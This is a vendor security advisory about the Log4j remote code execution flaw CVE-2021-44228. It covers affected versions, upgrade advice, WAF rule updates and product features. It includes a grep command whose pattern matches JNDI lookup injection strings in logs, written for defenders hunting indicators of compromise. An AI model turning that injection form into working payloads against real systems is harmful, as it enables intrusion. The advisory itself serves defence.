CVE-2021-44228 - Zero Day Vulnerability in Apache Log4j That Allows Remote Code Execution (RCE)
A critical unauthenticated remote code execution (RCE) vulnerability (CVE-2021-44228) has been reported in Log4j, an open source logging library. Akamai has been working directly with customers to deploy web application firewall (WAF) rules over the past 24 hours to mitigate the exposure. Log4j is incorporated into many popular frameworks, making the impact widespread. The vulnerability is actively being exploited, and when abused allows a threat actor to execute arbitrary code on systems running apps that contain the library.
The vulnerability impacts multiple versions of Log4j and the applications that depend on it (these include Apache Struts2, Apache Solr, Apache Druid, Apache Flink and many others). Application administrators and developers are advised to verify which applications use the Log4j package, and, if the package version is in the vulnerable range (Log4j versions 2.0 - 2.14.1), immediately update to version 2.16.0 or later as soon as possible. The latest version can already be found on the Log4j download page.
Akamai has now deployed an update to our existing Apache rule to include mitigation for this Zero Day CVE. This includes updating rule 3000014 for Akamai’s Kona Rule Set or Adaptive Security Engine (for customers using the Automated Attack Group engine, we have updated the Command Injection group). These are the engines used in Akamai’s Kona Site Defender, Web Application Protector, and App & API Protector products. Any customers who currently have those rules (or attack groups) activated in DENY mode will receive automatic in-line protection for the following protection engines and versions:
Kona Rule Set - Any version dated October 29, 2019 or later
Automated Attack Groups - Any version
Adaptive Security Engine - Any version
Servers hosting internet-facing applications may already be compromised. On many systems, the following command can display exploit attempts to identify Indicators of Compromise:
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns)://' /var/log
We recommend that all users of Log4j 2.0 through 2.14.1 update as soon as possible, but when that is not possible, the potentially vulnerable machines should limit outbound access as much as possible. Multiple outbound protocols can be used to exploit vulnerable systems, so blocking specific outbound ports or hosts may not be sufficient
Akamai customers with Guardicore Centra, now part of the Akamai security suite, can leverage Centra process level visibility to identify all Java-based applications in their network that are potentially at risk. Customers can then map their exposure and assess their risk level (Eg internet-facing services, infrastructure services exposed to the entire data-center, local applications serving limited users and machines) and apply fast-response risk reduction Segmentation rules until a patch can be deployed.
